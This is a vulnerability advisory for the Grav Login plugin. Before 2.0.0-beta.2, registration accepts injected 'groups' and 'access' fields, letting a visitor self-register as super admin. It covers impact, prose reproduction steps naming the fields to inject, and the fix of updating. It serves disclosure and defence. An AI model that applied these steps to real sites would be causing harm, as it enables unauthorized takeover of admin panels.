Grav Login Plugin Privilege Escalation Vulnerability

A vulnerability in the Grav Login plugin, affecting versions prior to 2.0.0-beta.2, allows for unauthorized privilege escalation. The issue arises because the Login::register() method accepts user-supplied groups and access fields from the registration POST data without proper server-side validation. When registration is enabled and these fields are included in the allowed fields list, an attacker can self-register with admin.super privileges by injecting the fields into the registration request. This vulnerability is rooted in the absence of adequate validation, leaving only a configuration-based allowlist as a defense, which is not a reliable security measure.

Impact

Exploitation of this vulnerability allows an unauthenticated user to self-register as a super admin, gaining full access to the admin panel. This access can be leveraged to execute remote code or upload malicious plugins, according to Grav's advisory.

Reproduction

To reproduce this vulnerability, enable the registration feature in the Grav Login plugin and configure the allowed fields to include 'groups' and 'access'. Then, send a registration request POSTing values for 'username', 'password', 'email', 'fullname', and inject values for 'groups' and 'access' to escalate privileges to super admin.

Remediation

Users can update to Grav Login Plugin version 2.0.0-beta.2 or later, where this vulnerability has been fixed. Instructions for updating the plugin can be found in the Grav documentation.